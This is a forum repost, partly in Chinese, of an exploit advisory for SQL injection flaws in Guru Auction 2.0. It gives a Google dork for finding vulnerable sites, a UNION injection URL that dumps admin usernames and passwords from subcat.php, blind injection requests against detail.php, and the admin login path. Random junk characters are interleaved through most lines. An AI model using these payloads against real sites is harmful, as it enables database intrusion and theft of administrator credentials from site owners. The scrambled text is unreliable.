Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
8 i: q1 @3 `; ]7 r
' j: W/ V; v# \7 m! l# s# r作者 : v3n0m
: M1 O7 F5 h W" J应用 : Guru Auction 2.0
1 o" @; i* f* @& P% N$ {+ PPrice : $49
! ?6 d" H% {- P2 }. a$ ]Vendor : http://www.guruscript.com/
0 n1 N6 ?/ _* {) L6 eGoogle Dork : inurl:subcat.php?cate_id=/ L7 M& D* u+ K0 l: c
/ X4 |9 }( Q, e( b5 ~+ w- r% f/ cSQLi p0c:
) `' n8 S4 V p4 Z4 R& Y! A~~~~~~~~~~
1 J9 K& D4 Z6 H0 Ghttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
( x3 Y7 Z! y9 v6 E, E
: a6 Y( t8 m0 L
# z5 U- V$ s2 l+ j盲注 p0c:0 u8 y- R+ Q3 x4 ^0 |3 n9 t4 V
~~~~~~~~~~
! X* J8 k4 a, Q. c0 i$ Z; Whttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
/ s. y3 i4 K7 `, |4 {http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false4 C! A2 i2 Q! Y7 l9 i6 ^
& l6 {" i/ w: B2 u管理登录入口:
# N+ ?) z, ~9 h' H; b. O' x~~~~~~~~~~. s |( [" w T) D% i& T
http://domain.tld/[path]/admin/# F U" F* f- D1 ` l! O+ c5 j0 U+ s
|
发表于 2012-12-31 09:24:05
收藏
支持
反对